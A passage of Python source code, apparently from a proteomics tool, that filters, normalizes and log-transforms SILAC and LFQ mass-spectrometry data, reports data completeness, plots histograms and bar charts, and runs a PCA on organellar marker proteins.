df_index = df_index.unstack(["Map", "Fraction"])
except ValueError:
df_index = df_index.groupby(by=df_index.index.names).agg(np.nansum, axis=0)
df_index = df_index.unstack(["Map", "Fraction"])
df_index.replace(0, np.nan, inplace=True)
shape_dict["Original size"]=df_index.shape
fraction_wCyt = list(df_index.columns.get_level_values("Fraction").unique())
#Cyt is removed only if it is not an NMC split
if "Cyt" in fraction_wCyt and len(fraction_wCyt) >= 4:
df_index.drop("Cyt", axis=1, level="Fraction", inplace=True)
try:
if self.acquisition == "LFQ5 - Spectronaut":
df_index.drop("01K", axis=1, level="Fraction", inplace=True)
except:
pass
self.fractions = natsort.natsorted(list(df_index.columns.get_level_values("Fraction").unique()))
self.df_index = df_index
return df_index
def stringency_silac(df_index):
"""
The multiindex dataframe is subjected to stringency filtering. Only Proteins with complete profiles are considered (a set of f.e. 5 SILAC ratios
in case you have 5 fractions / any proteins with missing values were rejected). Proteins were retained with 3 or more quantifications in each
subfraction (=count). Furthermore, proteins with only 2 quantification events in one or more subfraction were retained, if their ratio variability for
ratios obtained with 2 quantification events was below 30% (=var). SILAC ratios were linearly normalized by division through the fraction median.
Subsequently normalization to SILAC loading was performed.Data is annotated based on specified marker set e.g. eLife.
Args:
df_index: multiindex dataframe, which contains 3 level labels: MAP, Fraction, Type
RatioHLcount: int, 2
RatioVariability: int, 30
df_organellarMarkerSet: df, columns: "Gene names", "Compartment", no index
fractions: list of fractions e.g. ["01K", "03K", ...]
Returns:
df_stringency_mapfracstacked: dataframe, in which "MAP" and "Fraction" are stacked;
columns "Ratio H/L count", "Ratio H/L variability [%]", and "Ratio H/L" stored as single level indices
shape_dict["Shape after Ratio H/L count (>=3)/var (count>=2, var<30) filtering"] of df_countvarfiltered_stacked
shape_dict["Shape after filtering for complete profiles"] of df_stringency_mapfracstacked
"""
# Fraction and Map will be stacked
df_stack = df_index.stack(["Fraction", "Map"])
# filtering for sufficient number of quantifications (count in "Ratio H/L count"), taken variability (var in Ratio H/L variability [%]) into account
# zip: allows direct comparison of count and var
# only if the filtering parameters are fulfilled the data will be introduced into df_countvarfiltered_stacked
#default setting: RatioHLcount = 2 ; RatioVariability = 30
df_countvarfiltered_stacked = df_stack.loc[[count>RatioHLcount or (count==RatioHLcount and var<RatioVariability)
for var, count in zip(df_stack["Ratio H/L variability [%]"], df_stack["Ratio H/L count"])]]
shape_dict["Shape after Ratio H/L count (>=3)/var (count==2, var<30) filtering"] = df_countvarfiltered_stacked.unstack(["Fraction", "Map"]).shape
# "Ratio H/L":normalization to SILAC loading, each individual experiment (FractionXMap) will be divided by its median
# np.median([...]): only entries, that are not NANs are considered
df_normsilac_stacked = df_countvarfiltered_stacked["Ratio H/L"]\
.unstack(["Fraction", "Map"])\
.apply(lambda x: x/np.nanmedian(x), axis=0)\
.stack(["Map", "Fraction"])
df_stringency_mapfracstacked = df_countvarfiltered_stacked[["Ratio H/L count", "Ratio H/L variability [%]"]].join(
pd.DataFrame(df_normsilac_stacked, columns=["Ratio H/L"]))
# dataframe is grouped (Map, id), that allows the filtering for complete profiles
df_stringency_mapfracstacked = df_stringency_mapfracstacked.groupby(["Map", "id"]).filter(lambda x: len(x)>=len(self.fractions))
shape_dict["Shape after filtering for complete profiles"]=df_stringency_mapfracstacked.unstack(["Fraction", "Map"]).shape
# Ratio H/L is converted into Ratio L/H
df_stringency_mapfracstacked["Ratio H/L"] = df_stringency_mapfracstacked["Ratio H/L"].transform(lambda x: 1/x)
#Annotation with marker genes
df_organellarMarkerSet = self.df_organellarMarkerSet
df_stringency_mapfracstacked.reset_index(inplace=True)
df_stringency_mapfracstacked = df_stringency_mapfracstacked.merge(df_organellarMarkerSet, how="left", on="Gene names")
df_stringency_mapfracstacked.set_index([c for c in df_stringency_mapfracstacked.columns
if c not in ["Ratio H/L count","Ratio H/L variability [%]","Ratio H/L"]], inplace=True)
df_stringency_mapfracstacked.rename(index={np.nan:"undefined"}, level="Compartment", inplace=True)
return df_stringency_mapfracstacked
def normalization_01_silac(df_stringency_mapfracstacked):
"""
The multiindex dataframe, that was subjected to stringency filtering, is 0-1 normalized ("Ratio H/L").
Args:
df_stringency_mapfracstacked: dataframe, in which "Map" and "Fraction" are stacked;
columns "Ratio H/L count", "Ratio H/L variability [%]", and "Ratio H/L" stored as single level indices
self:
fractions: list of fractions e.g. ["01K", "03K", ...]
data_completeness: series, for each individual map, as well as combined maps: 1 - (percentage of NANs)
Returns:
df_01_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "Ratio H/L" is 0-1 normalized and renamed to "normalized
profile"; the columns "Ratio H/L count", "Ratio H/L variability [%]", and "normalized profile" stored as single level indices;
plotting is possible now
self:
analysis_summary_dict["Data/Profile Completeness"] : df, with information about Data/Profile Completeness
column: "Experiment", "Map", "Data completeness", "Profile completeness"
no row index
"""
df_01norm_unstacked = df_stringency_mapfracstacked["Ratio H/L"].unstack("Fraction")
# 0:1 normalization of Ratio L/H
df_01norm_unstacked = df_01norm_unstacked.div(df_01norm_unstacked.sum(axis=1), axis=0)
df_01_stacked = df_stringency_mapfracstacked[["Ratio H/L count", "Ratio H/L variability [%]"]].join(pd.DataFrame
(df_01norm_unstacked.stack("Fraction"),columns=["Ratio H/L"]))
# "Ratio H/L" will be renamed to "normalized profile"
df_01_stacked.columns = [col if col!="Ratio H/L" else "normalized profile" for col in df_01_stacked.columns]
return df_01_stacked
def logarithmization_silac(df_stringency_mapfracstacked):
"""
The multiindex dataframe, that was subjected to stringency filtering, is logarithmized ("Ratio H/L").
Args:
df_stringency_mapfracstacked: dataframe, in which "MAP" and "Fraction" are stacked; the columns "Ratio H/L count", "Ratio H/L variability [%]",
and "Ratio H/L" stored as single level indices
Returns:
df_log_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "log profile" originates from logarithmized "Ratio H/L"
data; the columns "Ratio H/L count", "Ratio H/L variability [%]" and "log profile" are stored as single level indices;
PCA is possible now
"""
# logarithmizing, basis of 2
df_lognorm_ratio_stacked = df_stringency_mapfracstacked["Ratio H/L"].transform(np.log2)
df_log_stacked = df_stringency_mapfracstacked[["Ratio H/L count", "Ratio H/L variability [%]"]].join(
pd.DataFrame(df_lognorm_ratio_stacked, columns=["Ratio H/L"]))
# "Ratio H/L" will be renamed to "log profile"
df_log_stacked.columns = [col if col !="Ratio H/L" else "log profile" for col in df_log_stacked.columns]
return df_log_stacked
def stringency_lfq(df_index):
"""
The multiindex dataframe is subjected to stringency filtering. Only Proteins which were identified with
at least [4] consecutive data points regarding the "LFQ intensity", and if summed MS/MS counts >= n(fractions)*[2]
(LFQ5: min 10 and LFQ6: min 12, respectively; coverage filtering) were included.
Data is annotated based on specified marker set e.g. eLife.
Args:
df_index: multiindex dataframe, which contains 3 level labels: MAP, Fraction, Typ
self:
df_organellarMarkerSet: df, columns: "Gene names", "Compartment", no index
fractions: list of fractions e.g. ["01K", "03K", ...]
summed_MSMS_counts: int, 2
consecutiveLFQi: int, 4
Returns:
df_stringency_mapfracstacked: dataframe, in which "Map" and "Fraction" is stacked; "LFQ intensity" and "MS/MS count" define a
single-level column index
self:
shape_dict["Shape after MS/MS value filtering"] of df_mscount_mapstacked
shape_dict["Shape after consecutive value filtering"] of df_stringency_mapfracstacked
"""
df_index = df_index.stack("Map")
# sorting the level 0, in order to have LFQ intensity - MS/MS count instead of continuous alternation
df_index.sort_index(axis=1, level=0, inplace=True)
# "MS/MS count"-column: take the sum over the fractions; if the sum is larger than n[fraction]*2, it will be stored in the new dataframe
minms = (len(self.fractions) * self.summed_MSMS_counts)
if minms > 0:
df_mscount_mapstacked = df_index.loc[df_index[("MS/MS count")].apply(np.sum, axis=1) >= minms]
shape_dict["Shape after MS/MS value filtering"]=df_mscount_mapstacked.unstack("Map").shape
df_stringency_mapfracstacked = df_mscount_mapstacked.copy()
else:
df_stringency_mapfracstacked = df_index.copy()
# series no dataframe is generated; if there are at least i.e. 4 consecutive non-NANs, data will be retained
df_stringency_mapfracstacked.sort_index(level="Fraction", axis=1, key=natsort_index_keys, inplace=True)
df_stringency_mapfracstacked = df_stringency_mapfracstacked.loc[
df_stringency_mapfracstacked[("LFQ intensity")]\
.apply(lambda x: np.isfinite(x), axis=0)\
.apply(lambda x: sum(x) >= self.consecutiveLFQi and any(x.rolling(window=self.consecutiveLFQi).sum() >= self.consecutiveLFQi), axis=1)]
shape_dict["Shape after consecutive value filtering"]=df_stringency_mapfracstacked.unstack("Map").shape
df_stringency_mapfracstacked = df_stringency_mapfracstacked.copy().stack("Fraction")
#Annotation with marker genes
df_organellarMarkerSet = self.df_organellarMarkerSet
df_stringency_mapfracstacked.reset_index(inplace=True)
df_stringency_mapfracstacked = df_stringency_mapfracstacked.merge(df_organellarMarkerSet, how="left", on="Gene names")
df_stringency_mapfracstacked.set_index([c for c in df_stringency_mapfracstacked.columns
if c!="MS/MS count" and c!="LFQ intensity"], inplace=True)
df_stringency_mapfracstacked.rename(index={np.nan : "undefined"}, level="Compartment", inplace=True)
return df_stringency_mapfracstacked
def normalization_01_lfq(df_stringency_mapfracstacked):
"""
The multiindex dataframe, that was subjected to stringency filtering, is 0-1 normalized ("LFQ intensity").
Args:
df_stringency_mapfracstacked: dataframe, in which "Map" and "Fraction" is stacked, "LFQ intensity" and "MS/MS count" define a
single-level column index
self:
fractions: list of fractions e.g. ["01K", "03K", ...]
Returns:
df_01_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "LFQ intensity" is 0-1 normalized and renamed to
"normalized profile"; the columns "normalized profile" and "MS/MS count" are stored as single level indices; plotting is possible now
"""
df_01norm_mapstacked = df_stringency_mapfracstacked["LFQ intensity"].unstack("Fraction")
# 0:1 normalization of Ratio L/H
df_01norm_unstacked = df_01norm_mapstacked.div(df_01norm_mapstacked.sum(axis=1), axis=0)
df_rest = df_stringency_mapfracstacked.drop("LFQ intensity", axis=1)
df_01_stacked = df_rest.join(pd.DataFrame(df_01norm_unstacked.stack(
"Fraction"),columns=["LFQ intensity"]))
# rename columns: "LFQ intensity" into "normalized profile"
df_01_stacked.columns = [col if col!="LFQ intensity" else "normalized profile" for col in
df_01_stacked.columns]
#imputation
df_01_stacked = df_01_stacked.unstack("Fraction").replace(np.NaN, 0).stack("Fraction")
df_01_stacked = df_01_stacked.sort_index()
return df_01_stacked
def logarithmization_lfq(df_stringency_mapfracstacked):
"""The multiindex dataframe, that was subjected to stringency filtering, is logarithmized ("LFQ intensity").
Args:
df_stringency_mapfracstacked: dataframe, in which "Map" and "Fraction" is stacked; "LFQ intensity" and "MS/MS count" define a
single-level column index
Returns:
df_log_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "log profile" originates from logarithmized
"LFQ intensity"; the columns "log profile" and "MS/MS count" are stored as single level indices; PCA is possible now
"""
df_lognorm_ratio_stacked = df_stringency_mapfracstacked["LFQ intensity"].transform(np.log2)
df_rest = df_stringency_mapfracstacked.drop("LFQ intensity", axis=1)
df_log_stacked = df_rest.join(pd.DataFrame(df_lognorm_ratio_stacked, columns=["LFQ intensity"]))
# "LFQ intensity" will be renamed to "log profile"
df_log_stacked.columns = [col if col!="LFQ intensity" else "log profile" for col in df_log_stacked.columns]
return df_log_stacked
def split_ids_uniprot(el):
"""
This finds the primary canoncial protein ID in the protein group. If no canonical ID is present it selects the first isoform ID.
"""
p1 = el.split(";")[0]
if "-" not in p1:
return p1
else:
p = p1.split("-")[0]
if p in el.split(";"):
return p
else:
return p1
if self.acquisition == "SILAC - MQ":
# Index data
df_index = indexingdf()
map_names = df_index.columns.get_level_values("Map").unique()
self.map_names = map_names
# Run stringency filtering and normalization
df_stringency_mapfracstacked = stringency_silac(df_index)
self.df_stringencyFiltered = df_stringency_mapfracstacked
self.df_01_stacked = normalization_01_silac(df_stringency_mapfracstacked)
self.df_log_stacked = logarithmization_silac(df_stringency_mapfracstacked)
# format and reduce 0-1 normalized data for comparison with other experiments
df_01_comparison = self.df_01_stacked.copy()
comp_ids = pd.Series([split_ids_uniprot(el) for el in df_01_comparison.index.get_level_values("Protein IDs")], name="Protein IDs")
df_01_comparison.index = df_01_comparison.index.droplevel("Protein IDs")
df_01_comparison.set_index(comp_ids, append=True, inplace=True)
df_01_comparison.drop(["Ratio H/L count", "Ratio H/L variability [%]"], inplace=True, axis=1)
df_01_comparison = df_01_comparison.unstack(["Map", "Fraction"])
df_01_comparison.columns = ["?".join(el) for el in df_01_comparison.columns.values]
df_01_comparison = df_01_comparison.copy().reset_index().drop(["C-Score", "Q-value", "Score", "Majority protein IDs", "Protein names", "id"], axis=1, errors="ignore")
# poopulate analysis summary dictionary with (meta)data
unique_proteins = [split_ids_uniprot(i) for i in set(self.df_01_stacked.index.get_level_values("Protein IDs"))]
unique_proteins.sort()
self.analysis_summary_dict["0/1 normalized data"] = df_01_comparison.to_json()
self.analysis_summary_dict["Unique Proteins"] = unique_proteins
self.analysis_summary_dict["changes in shape after filtering"] = shape_dict.copy()
analysis_parameters = {"acquisition" : self.acquisition,
"filename" : self.filename,
"comment" : self.comment,
"Ratio H/L count" : self.RatioHLcount,
"Ratio variability" : self.RatioVariability,
"organism" : self.organism,
}
self.analysis_summary_dict["Analysis parameters"] = analysis_parameters.copy()
# TODO this line needs to be removed.
self.analysed_datasets_dict[self.expname] = self.analysis_summary_dict.copy()
elif self.acquisition == "LFQ5 - MQ" or self.acquisition == "LFQ6 - MQ" or self.acquisition == "LFQ5 - Spectronaut" or self.acquisition == "LFQ6 - Spectronaut":
#if not summed_MS_counts:
# summed_MS_counts = self.summed_MS_counts
#if not consecutiveLFQi:
# consecutiveLFQi = self.consecutiveLFQi
if self.acquisition == "LFQ5 - MQ" or self.acquisition == "LFQ6 - MQ":
df_index = indexingdf()
elif self.acquisition == "LFQ5 - Spectronaut" or self.acquisition == "LFQ6 - Spectronaut":
df_index = spectronaut_LFQ_indexingdf()
map_names = df_index.columns.get_level_values("Map").unique()
self.map_names = map_names
df_stringency_mapfracstacked = stringency_lfq(df_index)
self.df_stringencyFiltered = df_stringency_mapfracstacked
self.df_log_stacked = logarithmization_lfq(df_stringency_mapfracstacked)
self.df_01_stacked = normalization_01_lfq(df_stringency_mapfracstacked)
df_01_comparison = self.df_01_stacked.copy()
comp_ids = pd.Series([split_ids_uniprot(el) for el in df_01_comparison.index.get_level_values("Protein IDs")], name="Protein IDs")
df_01_comparison.index = df_01_comparison.index.droplevel("Protein IDs")
df_01_comparison.set_index(comp_ids, append=True, inplace=True)
df_01_comparison.drop("MS/MS count", inplace=True, axis=1, errors="ignore")
df_01_comparison = df_01_comparison.unstack(["Map", "Fraction"])
df_01_comparison.columns = ["?".join(el) for el in df_01_comparison.columns.values]
df_01_comparison = df_01_comparison.copy().reset_index().drop(["C-Score", "Q-value", "Score", "Majority protein IDs", "Protein names", "id"], axis=1, errors="ignore")
self.analysis_summary_dict["0/1 normalized data"] = df_01_comparison.to_json()#double_precision=4) #.reset_index()
unique_proteins = [split_ids_uniprot(i) for i in set(self.df_01_stacked.index.get_level_values("Protein IDs"))]
unique_proteins.sort()
self.analysis_summary_dict["Unique Proteins"] = unique_proteins
self.analysis_summary_dict["changes in shape after filtering"] = shape_dict.copy()
analysis_parameters = {"acquisition" : self.acquisition,
"filename" : self.filename,
"comment" : self.comment,
"consecutive data points" : self.consecutiveLFQi,
"summed MS/MS counts" : self.summed_MSMS_counts,
"organism" : self.organism,
}
self.analysis_summary_dict["Analysis parameters"] = analysis_parameters.copy()
self.analysed_datasets_dict[self.expname] = self.analysis_summary_dict.copy()
#return self.df_01_stacked
elif self.acquisition == "Custom":
df_index = custom_indexing_and_normalization()
map_names = df_index.columns.get_level_values("Map").unique()
self.map_names = map_names
df_01_stacked = df_index.stack(["Map", "Fraction"])
df_01_stacked = df_01_stacked.reset_index().merge(self.df_organellarMarkerSet, how="left", on="Gene names")
df_01_stacked.set_index([c for c in df_01_stacked.columns if c not in ["normalized profile"]], inplace=True)
df_01_stacked.rename(index={np.nan:"undefined"}, level="Compartment", inplace=True)
self.df_01_stacked = df_01_stacked
df_01_comparison = self.df_01_stacked.copy()
comp_ids = pd.Series([split_ids_uniprot(el) for el in df_01_comparison.index.get_level_values("Protein IDs")], name="Protein IDs")
df_01_comparison.index = df_01_comparison.index.droplevel("Protein IDs")
df_01_comparison.set_index(comp_ids, append=True, inplace=True)
df_01_comparison.drop("MS/MS count", inplace=True, axis=1, errors="ignore")
df_01_comparison = df_01_comparison.unstack(["Map", "Fraction"])
df_01_comparison.columns = ["?".join(el) for el in df_01_comparison.columns.values]
df_01_comparison = df_01_comparison.copy().reset_index().drop(["C-Score", "Q-value", "Score", "Majority protein IDs", "Protein names", "id"], axis=1, errors="ignore")
self.analysis_summary_dict["0/1 normalized data"] = df_01_comparison.to_json()#double_precision=4) #.reset_index()
unique_proteins = [split_ids_uniprot(i) for i in set(self.df_01_stacked.index.get_level_values("Protein IDs"))]
unique_proteins.sort()
self.analysis_summary_dict["Unique Proteins"] = unique_proteins
self.analysis_summary_dict["changes in shape after filtering"] = shape_dict.copy()
analysis_parameters = {"acquisition" : self.acquisition,
"filename" : self.filename,
"comment" : self.comment,
"organism" : self.organism,
}
self.analysis_summary_dict["Analysis parameters"] = analysis_parameters.copy()
self.analysed_datasets_dict[self.expname] = self.analysis_summary_dict.copy()
else:
return "I do not know this"
def plot_log_data(self):
"""
Args:
self.df_log_stacked
Returns:
log_histogram: Histogram of log transformed data
"""
log_histogram = px.histogram(self.df_log_stacked.reset_index().sort_values(["Map", "Fraction"], key=natsort_list_keys),
x="log profile",
facet_col="Fraction",
facet_row="Map",
template="simple_white",
labels={"log profile": "log tranformed data ({})".format("LFQ intenisty" if self.acquisition != "SILAC - MQ" else "Ratio H/L")}
)
log_histogram.for_each_xaxis(lambda axis: axis.update(title={"text":""}))
log_histogram.for_each_yaxis(lambda axis: axis.update(title={"text":""}))
log_histogram.add_annotation(x=0.5, y=0, yshift=-50, xref="paper",showarrow=False, yref="paper",
text="log2(LFQ intensity)")
log_histogram.add_annotation(x=0, y=0.5, textangle=270, xref="paper",showarrow=False, yref="paper", xshift=-50,
text="count")
log_histogram.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
return log_histogram
def quantity_profiles_proteinGroups(self):
"""
Number of profiles, protein groups per experiment, and the data completness of profiles (total quantity, intersection) is calculated.
Args:
self:
acquisition: string, "LFQ6 - Spectronaut", "LFQ5 - Spectronaut", "LFQ5 - MQ", "LFQ6 - MQ", "SILAC - MQ"
df_index: multiindex dataframe, which contains 3 level labels: MAP, Fraction, Typ
df_01_stacked: df; 0-1 normalized data with "normalized profile" as column name
Returns:
self:
df_quantity_pr_pg: df; no index, columns: "filtering", "type", "npg", "npr", "npr_dc"; containign following information:
npg_t: protein groups per experiment total quantity
npgf_t = groups with valid profiles per experiment total quanitity
npr_t: profiles with any valid values
nprf_t = total number of valid profiles
npg_i: protein groups per experiment intersection
npgf_i = groups with valid profiles per experiment intersection
npr_i: profiles with any valid values in the intersection
nprf_i = total number of valid profiles in the intersection
npr_t_dc: profiles, % values != nan
nprf_t_dc = profiles, total, filtered, % values != nan
npr_i_dc: profiles, intersection, % values != nan
nprf_i_dc = profiles, intersection, filtered, % values != nan
df_npg | df_npgf: index: maps e.g. "Map1", "Map2",..., columns: fractions e.g. "03K", "06K", ...
npg_f = protein groups, per fraction
or npgf_f = protein groups, filtered, per fraction
df_npg_dc | df_npgf_dc: index: maps e.g. "Map1", "Map2",..., columns: fractions e.g. "03K", "06K", ...
npg_f_dc = protein groups, per fraction, % values != nan
or npgf_f_dc = protein groups, filtered, per fraction, % values != nan
"""
if self.acquisition == "SILAC - MQ":
df_index = self.df_index["Ratio H/L"]
df_01_stacked = self.df_01_stacked["normalized profile"]
elif self.acquisition.startswith("LFQ"):
df_index = self.df_index["LFQ intensity"]
df_01_stacked = self.df_01_stacked["normalized profile"].replace(0, np.nan)
elif self.acquisition == "Custom":
df_index = self.df_index["normalized profile"]
df_01_stacked = self.df_01_stacked["normalized profile"].replace(0, np.nan)
#unfiltered
npg_t = df_index.shape[0]
df_index_MapStacked = df_index.stack("Map")
npr_t = df_index_MapStacked.shape[0]/len(self.map_names)
npr_t_dc = 1-df_index_MapStacked.isna().sum().sum()/np.prod(df_index_MapStacked.shape)
#filtered
npgf_t = df_01_stacked.unstack(["Map", "Fraction"]).shape[0]
df_01_MapStacked = df_01_stacked.unstack("Fraction")
nprf_t = df_01_MapStacked.shape[0]/len(self.map_names)
nprf_t_dc = 1-df_01_MapStacked.isna().sum().sum()/np.prod(df_01_MapStacked.shape)
#unfiltered intersection
try:
df_index_intersection = df_index_MapStacked.groupby(level="Sequence").filter(lambda x : len(x)==len(self.map_names))
except:
df_index_intersection = df_index_MapStacked.groupby(level="Protein IDs").filter(lambda x : len(x)==len(self.map_names))
npr_i = df_index_intersection.shape[0]/len(self.map_names)
npr_i_dc = 1-df_index_intersection.isna().sum().sum()/np.prod(df_index_intersection.shape)
npg_i = df_index_intersection.unstack("Map").shape[0]
#filtered intersection
try:
df_01_intersection = df_01_MapStacked.groupby(level = "Sequence").filter(lambda x : len(x)==len(self.map_names))
except:
df_01_intersection = df_01_MapStacked.groupby(level = "Protein IDs").filter(lambda x : len(x)==len(self.map_names))
nprf_i = df_01_intersection.shape[0]/len(self.map_names)
nprf_i_dc = 1-df_01_intersection.isna().sum().sum()/np.prod(df_01_intersection.shape)
npgf_i = df_01_intersection.unstack("Map").shape[0]
# summarize in dataframe and save to attribute
df_quantity_pr_pg = pd.DataFrame(
{
"filtering": pd.Series(["before filtering", "before filtering", "after filtering", "after filtering"], dtype=np.dtype("O")),
"type": pd.Series(["total", "intersection", "total", "intersection"], dtype=np.dtype("O")),
"number of protein groups": pd.Series([npg_t, npg_i, npgf_t, npgf_i], dtype=np.dtype("float")),
"number of profiles": pd.Series([npr_t, npr_i, nprf_t, nprf_i], dtype=np.dtype("float")),
"data completeness of profiles": pd.Series([npr_t_dc, npr_i_dc, nprf_t_dc, nprf_i_dc], dtype=np.dtype("float"))})
self.df_quantity_pr_pg = df_quantity_pr_pg.reset_index()
self.analysis_summary_dict["quantity: profiles/protein groups"] = self.df_quantity_pr_pg.to_json()
#additional depth assessment per fraction
dict_npgf = {}
dict_npg = {}
list_npg_dc = []
list_npgf_dc = []
for df_intersection in [df_index_intersection, df_01_intersection]:
for fraction in self.fractions:
df_intersection_frac = df_intersection[fraction]
npgF_f_dc = 1-df_intersection_frac.isna().sum()/len(df_intersection_frac)
npgF_f = df_intersection_frac.unstack("Map").isnull().sum(axis=1).value_counts()
if fraction not in dict_npg.keys():
dict_npg[fraction] = npgF_f
list_npg_dc.append(npgF_f_dc)
else:
dict_npgf[fraction] = npgF_f
list_npgf_dc.append(npgF_f_dc)
df_npg = pd.DataFrame(dict_npg)
df_npg.index.name = "Protein Groups present in:"
df_npg.rename_axis("Fraction", axis=1, inplace=True)
df_npg = df_npg.stack("Fraction").reset_index()
df_npg = df_npg.rename({0: "Protein Groups"}, axis=1)
df_npg.sort_values(["Fraction", "Protein Groups present in:"], inplace=True, key=natsort_list_keys)
df_npgf = pd.DataFrame(dict_npgf)
df_npgf.index.name = "Protein Groups present in:"
df_npgf.rename_axis("Fraction", axis=1, inplace=True)
df_npgf = df_npgf.stack("Fraction").reset_index()
df_npgf = df_npgf.rename({0: "Protein Groups"}, axis=1)
df_npgf.sort_values(["Fraction", "Protein Groups present in:"], inplace=True, key=natsort_list_keys)
max_df_npg = df_npg["Protein Groups present in:"].max()
min_df_npg = df_npg["Protein Groups present in:"].min()
rename_numOFnans = {}
for x, y in zip(range(max_df_npg,min_df_npg-1, -1), range(max_df_npg+1)):
if y == 1:
rename_numOFnans[x] = "{} Map".format(y)
elif y == 0:
rename_numOFnans[x] = "PG not identified".format(y)
else:
rename_numOFnans[x] = "{} Maps".format(y)
for keys in rename_numOFnans.keys():
df_npg.loc[df_npg["Protein Groups present in:"] ==keys, "Protein Groups present in:"] = rename_numOFnans[keys]
df_npgf.loc[df_npgf["Protein Groups present in:"] ==keys, "Protein Groups present in:"] = rename_numOFnans[keys]
# summarize in dataframe and save to attributes
self.df_npg_dc = pd.DataFrame(
{
"Fraction" : pd.Series(self.fractions),
"Data completeness before filtering": pd.Series(list_npg_dc),
"Data completeness after filtering": pd.Series(list_npgf_dc),
})
self.df_npg = df_npg
self.df_npgf = df_npgf
def plot_quantity_profiles_proteinGroups(self):
"""
Args:
self:
df_quantity_pr_pg: df; no index, columns: "filtering", "type", "npg", "npr", "npr_dc"; further information: see above
Returns:
"""
df_quantity_pr_pg = self.df_quantity_pr_pg
layout = go.Layout(barmode="overlay",
xaxis_tickangle=90,
autosize=False,
width=300,
height=500,
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
#title="Map",
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
mirror=True),
template="simple_white")
fig_npg = go.Figure()
for t in df_quantity_pr_pg["type"].unique():
plot_df = df_quantity_pr_pg[df_quantity_pr_pg["type"] == t]
fig_npg.add_trace(go.Bar(
x=plot_df["filtering"],
y=plot_df["number of protein groups"],
name=t))
fig_npg.update_layout(layout, title="Number of Protein Groups", yaxis=go.layout.YAxis(title="Protein Groups"))
fig_npr = go.Figure()
for t in df_quantity_pr_pg["type"].unique():
plot_df = df_quantity_pr_pg[df_quantity_pr_pg["type"] == t]
fig_npr.add_trace(go.Bar(
x=plot_df["filtering"],
y=plot_df["number of profiles"],
name=t))
fig_npr.update_layout(layout, title="Number of Profiles")
df_quantity_pr_pg = df_quantity_pr_pg.sort_values("filtering")
fig_npr_dc = go.Figure()
for t in df_quantity_pr_pg["filtering"].unique():
plot_df = df_quantity_pr_pg[df_quantity_pr_pg["filtering"] == t]
fig_npr_dc.add_trace(go.Bar(
x=plot_df["type"],
y=plot_df["data completeness of profiles"],
name=t))
fig_npr_dc.update_layout(layout, title="Coverage", yaxis=go.layout.YAxis(title="Data completness"))
#fig_npr_dc.update_xaxes(tickangle=30)
fig_npg_F = px.bar(self.df_npg,
x="Fraction",
y="Protein Groups",
color="Protein Groups present in:",
template="simple_white",
title = "Protein groups per fraction - before filtering",
width=500)
fig_npgf_F = px.bar(self.df_npgf,
x="Fraction",
y="Protein Groups",
color="Protein Groups present in:",
template="simple_white",
title = "Protein groups per fraction - after filtering",
width=500)
fig_npg_F_dc = go.Figure()
for data_type in ["Data completeness after filtering", "Data completeness before filtering"]:
fig_npg_F_dc.add_trace(go.Bar(
x=self.df_npg_dc["Fraction"],
y=self.df_npg_dc[data_type],
name=data_type))
fig_npg_F_dc.update_layout(layout, barmode="overlay", title="Data completeness per fraction", yaxis=go.layout.YAxis(title=""), height=450, width=600)
return fig_npg, fig_npr, fig_npr_dc, fig_npg_F, fig_npgf_F, fig_npg_F_dc
def perform_pca(self):
"""
PCA will be performed, using logarithmized data.
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...}
"V-type proton ATP
df_log_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "log profile" originates from logarithmized "LFQ intensity"
and "Ratio H/L", respectively; additionally the columns "MS/MS count" and "Ratio H/L count|Ratio H/L variability [%]" are stored
as single level indices
df_01_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "LFQ intensity" is 0-1 normalized and renamed to "normalized
profile"; the columns "normalized profile"" and "MS/MS count" are stored as single level indices; plotting is possible now
Returns:
self:
df_pca: df, PCA was performed, while keeping the information of the Maps
columns: "PC1", "PC2", "PC3"
index: "Protein IDs", "Majority protein IDs", "Protein names", "Gene names", "Q-value", "Score", "id", "Map" "Compartment"
df_pca_combined: df, PCA was performed across the Maps
columns: "PC1", "PC2", "PC3"
index: "Protein IDs", "Majority protein IDs", "Protein names", "Gene names", "Q-value", "Score", "id", "Compartment"
df_pca_all_marker_cluster_maps: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3", filtered for marker genes, that are consistent
throughout all maps / coverage filtering.
"""
markerproteins = self.markerproteins
if self.acquisition == "SILAC - MQ":
df_01orlog_fracunstacked = self.df_log_stacked["log profile"].unstack("Fraction").dropna()
df_01orlog_MapFracUnstacked = self.df_log_stacked["log profile"].unstack(["Fraction", "Map"]).dropna()
elif self.acquisition.startswith("LFQ") or self.acquisition == "Custom":
df_01orlog_fracunstacked = self.df_01_stacked["normalized profile"].unstack("Fraction").dropna()
df_01orlog_MapFracUnstacked = self.df_01_stacked["normalized profile"].unstack(["Fraction", "Map"]).dropna()
pca = PCA(n_components=3)
# df_pca: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3"
df_pca = pd.DataFrame(pca.fit_transform(df_01orlog_fracunstacked))
df_pca.columns = ["PC1", "PC2", "PC3"]
df_pca.index = df_01orlog_fracunstacked.index
self.df_pca = df_pca.sort_index(level=["Gene names", "Compartment"])
# df_pca: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3"
df_pca_combined = pd.DataFrame(pca.fit_transform(df_01orlog_MapFracUnstacked))
df_pca_combined.columns = ["PC1", "PC2", "PC3"]
df_pca_combined.index = df_01orlog_MapFracUnstacked.index
self.df_pca_combined = df_pca_combined.sort_index(level=["Gene names", "Compartment"])
map_names = self.map_names
df_pca_all_marker_cluster_maps = pd.DataFrame()
df_pca_filtered = df_pca.unstack("Map").dropna()
for clusters in markerproteins:
for marker in markerproteins[clusters]:
try:
plot_try_pca = df_pca_filtered.xs(marker, level="Gene names", drop_level=False)
except KeyError:
continue
df_pca_all_marker_cluster_maps = df_pca_all_marker_cluster_maps.append(
plot_try_pca)
if len(df_pca_all_marker_cluster_maps) == 0:
df_pca_all_marker_cluster_maps = df_pca_filtered.stack("Map")
else:
